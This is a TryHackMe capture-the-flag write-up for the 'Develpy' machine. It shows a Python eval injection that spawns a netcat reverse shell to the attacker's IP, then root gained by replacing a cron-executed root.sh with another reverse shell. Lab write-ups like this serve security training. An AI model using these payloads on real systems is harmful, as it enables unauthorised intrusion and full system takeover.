Develpy — TryHackMe — WriteUp
Hello. I’m Rahmos. Here is my Develpy — TryHackMe — WriteUp. Check it out!
First, deploy the machine and nmap for opened ports:
nmap -A -T4 -p- -v <ip>
So there’re 2 ports opened: 22(SSH) and 10000(HTTP). Let’s first access the website at port 10000:
It’s an exception of Python code. Which means, it’s not a html page, but just python script. So let’s use nc to catch the request and input some information for the code:
nc <ip> 10000
As you can see, now I can input “number of exploits”. Let’s try “1”:
Ok so what the code does is that it will ping tryhackme.com for n times, based on the input. Let’s try command injection. First, start a listener on your machine:
nc -lvnp 4444
Then, I will input this line of code to spawn reverse shell.
__import__(‘os’).system(‘nc -e /bin/bash <your-VPN-ip> 4444’)
And the code has been executed! I’ve got the shell:
Spawn a tty shell using Python:
python -c ‘import pty;pty.spawn(“/bin/bash”)’
ls to view files and I’ve got the first user flag:
Next, I’ll find a way to own root. The image “credential.png” looks suspicious. Let’s transfer it to my machine.
This image is “npiet” image, which will store hidden data. You can use this link to extract hidden data. After extracted, I’ve got password of user king:
Now let’s sudo -l to see if I can run sudo as king:
Well I can’t. Let’s find another way. There’re 2 scripts: root.sh and run.sh inside king’s home:
I cannot chmod +x root.sh, but I can with run.sh:
Let’s see the cronjob:
Ok so each min root will execute “root.sh” inside king’s home folder. King doesn’t have permission to modify this root.sh, but king can delete it (because it’s in king’s home):
Now, I’ll create a new “root.sh”, but inside, I will spawn a reverse shell:
Now start a listener at port 5555:
nc -lvnp 5555
Wait 1 min and I’ve got the shell as root!
Get the final flag: